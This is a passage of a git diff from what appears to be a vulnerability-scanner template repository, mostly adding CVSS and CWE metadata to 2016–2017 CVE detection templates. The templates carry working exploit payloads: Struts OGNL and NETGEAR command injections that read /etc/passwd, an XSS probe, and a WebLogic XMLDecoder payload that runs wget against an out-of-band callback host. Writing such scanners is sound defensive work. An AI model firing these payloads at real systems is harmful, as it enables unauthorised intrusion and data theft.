name: wSecure Lite < 2.4 - Remote Code Execution (RCE)
|
name: wSecure Lite < 2.4 - Remote Code Execution (RCE)
|
||||||
author: daffainfo
|
author: daffainfo
|
||||||
severity: critical
|
severity: high
|
||||||
description: The wsecure plugin before 2.4 for WordPress has remote code execution via shell metacharacters in the wsecure-config.php publish parameter.
|
description: The wsecure plugin before 2.4 for WordPress has remote code execution via shell metacharacters in the wsecure-config.php publish parameter.
|
||||||
reference:
|
reference:
|
||||||
- https://www.pluginvulnerabilities.com/2016/07/12/remote-code-execution-rce-vulnerability-in-wsecure-lite/
|
- https://www.pluginvulnerabilities.com/2016/07/12/remote-code-execution-rce-vulnerability-in-wsecure-lite/
|
||||||
- https://www.acunetix.com/vulnerabilities/web/wordpress-plugin-wsecure-lite-remote-code-execution-2-3/
|
- https://www.acunetix.com/vulnerabilities/web/wordpress-plugin-wsecure-lite-remote-code-execution-2-3/
|
||||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10960
|
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10960
|
||||||
tags: cve,cve2016,wordpress,wp-plugin,rce
|
tags: cve,cve2016,wordpress,wp-plugin,rce
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
||||||
|
cvss-score: 8.80
|
||||||
|
cve-id: CVE-2016-10960
|
||||||
|
cwe-id: CWE-20
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: POST
|
- method: POST
|
||||||
|
|
|
@ -8,6 +8,12 @@ info:
|
||||||
- https://www.vulnerability-lab.com/get_content.php?id=1808
|
- https://www.vulnerability-lab.com/get_content.php?id=1808
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2016-10993
|
- https://nvd.nist.gov/vuln/detail/CVE-2016-10993
|
||||||
tags: cve,cve2016,wordpress,wp-theme,xss
|
tags: cve,cve2016,wordpress,wp-theme,xss
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
|
||||||
|
cvss-score: 5.40
|
||||||
|
cve-id: CVE-2016-10993
|
||||||
|
cwe-id: CWE-79
|
||||||
|
description: "The ScoreMe theme through 2016-04-01 for WordPress has XSS via the s parameter."
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
|
|
@ -9,6 +9,11 @@ info:
|
||||||
reference:
|
reference:
|
||||||
- https://www.exploit-db.com/exploits/39858
|
- https://www.exploit-db.com/exploits/39858
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2016-2004
|
- https://nvd.nist.gov/vuln/detail/CVE-2016-2004
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||||
|
cvss-score: 9.80
|
||||||
|
cve-id: CVE-2016-2004
|
||||||
|
cwe-id: CWE-306
|
||||||
|
|
||||||
network:
|
network:
|
||||||
- inputs:
|
- inputs:
|
||||||
|
|
|
@ -9,6 +9,11 @@ info:
|
||||||
- https://erpscan.io/advisories/erpscan-16-009-sap-xmii-directory-traversal-vulnerability/
|
- https://erpscan.io/advisories/erpscan-16-009-sap-xmii-directory-traversal-vulnerability/
|
||||||
- https://www.cvedetails.com/cve/CVE-2016-2389
|
- https://www.cvedetails.com/cve/CVE-2016-2389
|
||||||
tags: cve,cve2016,lfi,sap
|
tags: cve,cve2016,lfi,sap
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||||
|
cvss-score: 7.50
|
||||||
|
cve-id: CVE-2016-2389
|
||||||
|
cwe-id: CWE-22
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
|
|
@ -10,13 +10,17 @@ info:
|
||||||
- https://cwiki.apache.org/confluence/display/WW/S2-032
|
- https://cwiki.apache.org/confluence/display/WW/S2-032
|
||||||
- https://struts.apache.org/docs/s2-032.html
|
- https://struts.apache.org/docs/s2-032.html
|
||||||
tags: cve,cve2016,struts,rce,apache
|
tags: cve,cve2016,struts,rce,apache
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||||
|
cvss-score: 8.10
|
||||||
|
cve-id: CVE-2016-3081
|
||||||
|
cwe-id: CWE-77
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- raw:
|
- raw:
|
||||||
- |
|
- |
|
||||||
GET /index.action?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&pp=%5C%5CA&ppp=%20&encoding=UTF-8&cmd=cat%20/etc/passwd HTTP/1.1
|
GET /index.action?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&pp=%5C%5CA&ppp=%20&encoding=UTF-8&cmd=cat%20/etc/passwd HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
Content-Length: 4
|
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
|
|
@ -4,9 +4,14 @@ info:
|
||||||
name: NETGEAR DGN2200 / DGND3700 - Admin Password Disclosure
|
name: NETGEAR DGN2200 / DGND3700 - Admin Password Disclosure
|
||||||
author: suman_kar
|
author: suman_kar
|
||||||
severity: critical
|
severity: critical
|
||||||
description: Vulnerability exists within the page 'BSW_cxttongr.htm' which can allow a remote attacker to access this page without any authentication. Attacker can use this password to gain administrator access of the targeted routers web interface.
|
description: A vulnerability exists within the page 'BSW_cxttongr.htm' which can allow a remote attacker to access this page without any authentication. The attacker can then use this password to gain administrator access of the targeted router's web interface.
|
||||||
tags: cve,cve2016,iot,netgear,router
|
tags: cve,cve2016,iot,netgear,router
|
||||||
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-5649
|
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-5649
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||||
|
cvss-score: 9.80
|
||||||
|
cve-id: CVE-2016-5649
|
||||||
|
cwe-id: CWE-200
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- raw:
|
- raw:
|
||||||
|
|
|
@ -0,0 +1,32 @@
|
||||||
|
id: CVE-2016-6277
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: NETGEAR routers (including R6400, R7000, R8000 and similar) RCE
|
||||||
|
author: pikpikcu
|
||||||
|
severity: high
|
||||||
|
description: NETGEAR R6250 before 1.0.4.6.Beta, R6400 before 1.0.1.18.Beta, R6700 before 1.0.1.14.Beta, R6900, R7000 before 1.0.7.6.Beta, R7100LG before 1.0.0.28.Beta, R7300DST before 1.0.0.46.Beta, R7900 before 1.0.1.8.Beta, R8000 before 1.0.3.26.Beta, D6220, D6400, D7000, and possibly other routers allow remote attackers to execute arbitrary commands via shell metacharacters in the path info to cgi-bin/.
|
||||||
|
tags: cve,cves2016,netgear,rce,iot
|
||||||
|
reference:
|
||||||
|
- https://www.sj-vs.net/2016/12/10/temporary-fix-for-cert-vu582384-cwe-77-on-netgear-r7000-and-r6400-routers/
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2016-6277
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
|
||||||
|
cvss-score: 8.80
|
||||||
|
cve-id: CVE-2016-6277
|
||||||
|
cwe-id: CWE-352
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/cgi-bin/;cat$IFS/etc/passwd"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:.*:0:0"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -7,6 +7,11 @@ info:
|
||||||
description: On the Trend Micro Threat Discovery Appliance 2.6.1062r1, directory traversal when processing a session_id cookie allows a remote, unauthenticated attacker to delete arbitrary files as root. This can be used to bypass authentication or cause a DoS.
|
description: On the Trend Micro Threat Discovery Appliance 2.6.1062r1, directory traversal when processing a session_id cookie allows a remote, unauthenticated attacker to delete arbitrary files as root. This can be used to bypass authentication or cause a DoS.
|
||||||
reference: https://gist.github.com/malerisch/5de8b408443ee9253b3954a62a8d97b4
|
reference: https://gist.github.com/malerisch/5de8b408443ee9253b3954a62a8d97b4
|
||||||
tags: cve,cve2016,lfi
|
tags: cve,cve2016,lfi
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||||
|
cvss-score: 9.80
|
||||||
|
cve-id: CVE-2016-7552
|
||||||
|
cwe-id: CWE-22
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
|
|
@ -8,6 +8,11 @@ info:
|
||||||
Cross-site scripting (XSS) vulnerability in valider_xml.php in SPIP 3.1.2 and earlier allows remote attackers to inject arbitrary web script or HTML via the var_url parameter in a valider_xml action.
|
Cross-site scripting (XSS) vulnerability in valider_xml.php in SPIP 3.1.2 and earlier allows remote attackers to inject arbitrary web script or HTML via the var_url parameter in a valider_xml action.
|
||||||
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-7981
|
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-7981
|
||||||
tags: cve,cve2016,xss,spip
|
tags: cve,cve2016,xss,spip
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||||
|
cvss-score: 6.10
|
||||||
|
cve-id: CVE-2016-7981
|
||||||
|
cwe-id: CWE-79
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
|
|
@ -0,0 +1,38 @@
|
||||||
|
id: CVE-2016-8527
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Aruba Airwave - (XSS)
|
||||||
|
author: pikpikcu
|
||||||
|
severity: medium
|
||||||
|
description: Aruba Airwave all versions up to, but not including, 8.2.3.1 is vulnerable to a reflected cross-site scripting (XSS).
|
||||||
|
reference:
|
||||||
|
- https://www.exploit-db.com/exploits/41482
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2016-8527
|
||||||
|
tags: cves,cve2016,aruba,xss
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||||
|
cvss-score: 6.10
|
||||||
|
cve-id: CVE-2016-8527
|
||||||
|
cwe-id: CWE-79
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/visualrf/group_list.xml?aps=1&start=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&end=500&match"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "</script><script>alert(document.domain)</script>"
|
||||||
|
part: body
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- text/html
|
|
@ -7,6 +7,11 @@ info:
|
||||||
description: Oracle, GlassFish Server Open Source Edition 4.1 is vulnerable to both authenticated and unauthenticated Directory Traversal vulnerability, that can be exploited by issuing a specially crafted HTTP GET request.
|
description: Oracle, GlassFish Server Open Source Edition 4.1 is vulnerable to both authenticated and unauthenticated Directory Traversal vulnerability, that can be exploited by issuing a specially crafted HTTP GET request.
|
||||||
reference: https://www.exploit-db.com/exploits/45196
|
reference: https://www.exploit-db.com/exploits/45196
|
||||||
tags: cve,cve2017,oracle,glassfish,lfi
|
tags: cve,cve2017,oracle,glassfish,lfi
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||||
|
cvss-score: 7.50
|
||||||
|
cve-id: CVE-2017-1000028
|
||||||
|
cwe-id: CWE-22
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
|
|
@ -7,6 +7,11 @@ info:
|
||||||
reference: https://www.exploit-db.com/exploits/49693
|
reference: https://www.exploit-db.com/exploits/49693
|
||||||
description: jqueryFileTree 2.1.5 and older Directory Traversal
|
description: jqueryFileTree 2.1.5 and older Directory Traversal
|
||||||
tags: cve,cve2017,wordpress,wp-plugin,lfi
|
tags: cve,cve2017,wordpress,wp-plugin,lfi
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||||
|
cvss-score: 7.50
|
||||||
|
cve-id: CVE-2017-1000170
|
||||||
|
cwe-id: CWE-22
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: POST
|
- method: POST
|
||||||
|
|
|
@ -11,16 +11,18 @@ info:
|
||||||
- https://blog.mindedsecurity.com/2016/02/rce-in-oracle-netbeans-opensource.html
|
- https://blog.mindedsecurity.com/2016/02/rce-in-oracle-netbeans-opensource.html
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2017-1000486
|
- https://nvd.nist.gov/vuln/detail/CVE-2017-1000486
|
||||||
tags: cve,cve2017,primetek,rce
|
tags: cve,cve2017,primetek,rce
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||||
|
cvss-score: 9.80
|
||||||
|
cve-id: CVE-2017-1000486
|
||||||
|
cwe-id: CWE-326
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- raw:
|
- raw:
|
||||||
- |
|
- |
|
||||||
POST /javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
|
POST /javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
Connection: close
|
|
||||||
Content-Length: 160
|
|
||||||
Accept: */*
|
Accept: */*
|
||||||
Accept-Language: en
|
|
||||||
Content-Type: application/x-www-form-urlencoded
|
Content-Type: application/x-www-form-urlencoded
|
||||||
Accept-Encoding: gzip, deflate
|
Accept-Encoding: gzip, deflate
|
||||||
|
|
||||||
|
|
|
@ -3,10 +3,14 @@ id: CVE-2017-10075
|
||||||
info:
|
info:
|
||||||
name: Oracle Content Server XSS
|
name: Oracle Content Server XSS
|
||||||
author: madrobot
|
author: madrobot
|
||||||
severity: medium
|
severity: high
|
||||||
description: The vulnerability can be used to include HTML or JavaScript code to the affected web page. The code is executed in the browser of users if they visit the manipulated site.
|
description: The vulnerability can be used to include HTML or JavaScript code to the affected web page. The code is executed in the browser of users if they visit the manipulated site.
|
||||||
reference: http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html
|
reference: http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html
|
||||||
tags: cve,cve2017,xss,oracle
|
tags: cve,cve2017,xss,oracle
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N
|
||||||
|
cvss-score: 8.20
|
||||||
|
cve-id: CVE-2017-10075
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
|
|
@ -8,7 +8,11 @@ info:
|
||||||
reference:
|
reference:
|
||||||
- https://github.com/vulhub/vulhub/tree/fda47b97c7d2809660a4471539cd0e6dbf8fac8c/weblogic/CVE-2017-10271
|
- https://github.com/vulhub/vulhub/tree/fda47b97c7d2809660a4471539cd0e6dbf8fac8c/weblogic/CVE-2017-10271
|
||||||
- https://github.com/SuperHacker-liuan/cve-2017-10271-poc
|
- https://github.com/SuperHacker-liuan/cve-2017-10271-poc
|
||||||
tags: cve,cve2017,rce,oracle,weblogic
|
tags: cve,cve2017,rce,oracle,weblogic,oob
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
|
||||||
|
cvss-score: 7.50
|
||||||
|
cve-id: CVE-2017-10271
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- raw:
|
- raw:
|
||||||
|
@ -17,43 +21,28 @@ requests:
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
Accept: */*
|
Accept: */*
|
||||||
Accept-Language: en
|
Accept-Language: en
|
||||||
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
|
|
||||||
Connection: close
|
|
||||||
Content-Type: text/xml
|
Content-Type: text/xml
|
||||||
Content-Length: 5178
|
|
||||||
|
|
||||||
<?xml version="1.0" encoding="utf-8"?>
|
<?xml version="1.0" encoding="utf-8"?>
|
||||||
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
|
<soapenv:Envelope
|
||||||
|
xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
|
||||||
<soapenv:Header>
|
<soapenv:Header>
|
||||||
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
|
<work:WorkContext
|
||||||
<java>
|
xmlns:work="http://bea.com/2004/06/soap/workarea/">
|
||||||
<void class="weblogic.utils.Hex" method="fromHexString" id="cls">
|
<java version="1.4.0" class="java.beans.XMLDecoder">
|
||||||
<string>0xcafebabe0000003200670a001700350800360a003700380a0039003a08003b0a0039003c07003d0a0007003508003e0a0039003f0a003900400b004100420800430800440800450800460700470a001100480a001100490a0011004a0a004b004c07004d07004e0100063c696e69743e010003282956010004436f646501000f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c655461626c650100047468697301001e4c636f6d2f737570657265616d2f6578706c6f6974732f586d6c4578703b010003736179010029284c6a6176612f6c616e672f537472696e673b294c6a6176612f696f2f496e70757453747265616d3b010003636d640100124c6a6176612f6c616e672f537472696e673b01000769734c696e75780100015a0100056f73547970010004636d64730100104c6a6176612f7574696c2f4c6973743b01000e70726f636573734275696c64657201001a4c6a6176612f6c616e672f50726f636573734275696c6465723b01000470726f630100134c6a6176612f6c616e672f50726f636573733b0100164c6f63616c5661726961626c65547970655461626c650100244c6a6176612f7574696c2f4c6973743c4c6a6176612f6c616e672f537472696e673b3e3b01000d537461636b4d61705461626c6507004f07005001000a457863657074696f6e7307005101000a536f7572636546696c6501000b586d6c4578702e6a6176610c001800190100076f732e6e616d650700520c0053005407004f0c0055005601000377696e0c005700580100136a6176612f7574696c2f41727261794c697374010004244e4f240c0059005a0c005b005c0700500c005d005e0100092f62696e2f626173680100022d63010007636d642e6578650100022f630100186a6176612f6c616e672f50726f636573734275696c6465720c0018005f0c006000610c006200630700640c0065006601001c636f6d2f737570657265616d2f6578706c6f6974732f586d6c4578700100106a6176612f6c616e672f4f626a6563740100106a6176612f6c616e672f537472696e6701000e6a6176612f7574696c2f4c6973740100136a6176612f6c616e672f457863657074696f6e0100106a6176612f6c616e672f53797374656d01000b67657450726f7065727479010026284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f537472696e673b01000b746f4c6f7765724361736501001428294c6a6176612f6c616e672f537472696e673b010008636f6e7461696e7301001b284c6a6176612f6c616e672f4368617253657175656e63653b295a01000a73746172747357697468010015284c6a6176612f6c616e672f537472696e673b295a010009737562737472696e670100152849294c6a6176612f6c616e672f537472696e673b010003616464010015284c6a6176612f6c616e672f4f626a6563743b295a010013284c6a6176612f7574696c2f4c6973743b295601001372656469726563744572726f7253747265616d01001d285a294c6a6176612f6c616e672f50726f636573734275696c6465723b010005737461727401001528294c6a6176612f6c616e672f50726f636573733b0100116a6176612f6c616e672f50726f6365737301000e676574496e70757453747265616d01001728294c6a6176612f696f2f496e70757453747265616d3b0021001600170000000000020001001800190001001a0000002f00010001000000052ab70001b100000002001b00000006000100000007001c0000000c000100000005001d001e00000001001f00200002001a0000016f000300070000009c043d1202b800034e2dc600112db600041205b60006990005033dbb000759b700083a042b1209b6000a99001319042b07b6000bb9000c020057a700441c9900231904120db9000c0200571904120eb9000c02005719042bb9000c020057a700201904120fb9000c02005719041210b9000c02005719042bb9000c020057bb0011591904b700123a05190504b60013571905b600143a061906b60015b000000004001b0000004a001200000012000200130008001400180015001a00180023001a002c001b003c001c0040001d004a001e0054001f00600021006a002200740023007d002600880027008f002800960029001c0000004800070000009c001d001e00000000009c0021002200010002009a00230024000200080094002500220003002300790026002700040088001400280029000500960006002a002b0006002c0000000c0001002300790026002d0004002e000000110004fd001a0107002ffc0021070030231c0031000000040001003200010033000000020034</string>
|
<void class="java.lang.ProcessBuilder">
|
||||||
</void>
|
<array class="java.lang.String" length="3">
|
||||||
<void class="org.mozilla.classfile.DefiningClassLoader">
|
<void index="0">
|
||||||
<void method="defineClass">
|
<string>/bin/bash</string>
|
||||||
<string>com.supeream.exploits.XmlExp</string>
|
|
||||||
<object idref="cls"></object>
|
|
||||||
<void method="newInstance">
|
|
||||||
<void method="say" id="proc">
|
|
||||||
<string>cat /etc/passwd</string>
|
|
||||||
</void>
|
|
||||||
</void>
|
</void>
|
||||||
</void>
|
<void index="1">
|
||||||
</void>
|
<string>-c</string>
|
||||||
<void class="java.lang.Thread" method="currentThread">
|
|
||||||
<void method="getCurrentWork">
|
|
||||||
<void method="getResponse">
|
|
||||||
<void method="getServletOutputStream">
|
|
||||||
<void method="writeStream">
|
|
||||||
<object idref="proc"></object>
|
|
||||||
</void>
|
|
||||||
<void method="flush"/>
|
|
||||||
</void>
|
|
||||||
<void method="getWriter"><void method="write"><string></string></void></void>
|
|
||||||
</void>
|
</void>
|
||||||
</void>
|
<void index="2">
|
||||||
</void>
|
<string>wget {{interactsh-url}}</string>
|
||||||
|
</void>
|
||||||
|
</array>
|
||||||
|
<void method="start"/></void>
|
||||||
</java>
|
</java>
|
||||||
</work:WorkContext>
|
</work:WorkContext>
|
||||||
</soapenv:Header>
|
</soapenv:Header>
|
||||||
|
@ -61,7 +50,7 @@ requests:
|
||||||
</soapenv:Envelope>
|
</soapenv:Envelope>
|
||||||
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: regex
|
- type: word
|
||||||
regex:
|
part: interactsh_protocol # Confirms the HTTP Interaction
|
||||||
- 'root:.*:0:0'
|
words:
|
||||||
part: body
|
- "http"
|
||||||
|
|
Some files were not shown because too many files have changed in this diff Show More
Loading…
Reference in New Issue